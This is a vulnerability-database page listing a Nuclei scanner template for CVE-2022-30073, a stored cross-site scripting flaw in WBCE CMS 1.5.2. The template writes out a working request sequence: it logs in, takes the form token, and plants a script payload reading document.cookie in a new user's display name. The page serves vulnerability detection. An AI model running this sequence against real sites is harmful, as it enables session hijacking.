Lucene search
K

WBCE CMS 1.5.2 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

WBCE CMS 1.5.2 - Cross-Site Scripting vulnerability allows injection of malicious scripts into web pages, posing risk of data theft, session hijacking, or website defacement

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-30073
17 May 202216:15
attackerkb
Circl
CVE-2022-30073
17 May 202220:27
circl
CNNVD
WBCE CMS 跨站脚本漏洞
17 May 202200:00
cnnvd
CNVD
WBCE CMS Cross-Site Scripting Vulnerability (CNVD-2022-68523)
19 May 202200:00
cnvd
CVE
CVE-2022-30073
17 May 202216:02
cve
Cvelist
CVE-2022-30073
17 May 202216:02
cvelist
NVD
CVE-2022-30073
17 May 202216:15
nvd
OSV
CVE-2022-30073
17 May 202216:15
osv
Prion
Cross site scripting
17 May 202216:15
prion
RedhatCVE
CVE-2022-30073
22 May 202523:24
redhatcve
Rows per page
id: CVE-2022-30073

info:
  name: WBCE CMS 1.5.2 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://github.com/APTX-4879/CVE
    - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2022-30073
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-30073
    cwe-id: CWE-79
    epss-score: 0.0154
    epss-percentile: 0.71877
    cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: wbce
    product: wbce_cms
  tags: cve2022,cve,wbcecms,xss,wbce,vuln

http:
  - raw:
      - |
        POST /admin/login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login
      - |
        GET /admin/users/index.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /admin/users/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
      - |
        GET /admin/users/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<p><b><script>alert(document.cookie)</script>"
          - "WBCECMS"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: formtoken
        group: 1
        regex:
          - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
        internal: true
        part: body
# digest: 490a00463044022028a17b391d6766c02cf56597fe316e796537afd33ef2101e2220ae195914e9b402201efc96cd638657f54acb3015b69cc22156626225c1b263e9d635a4d8fbb9a10d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 23.5
CVSS 3.15.4
EPSS0.0154
32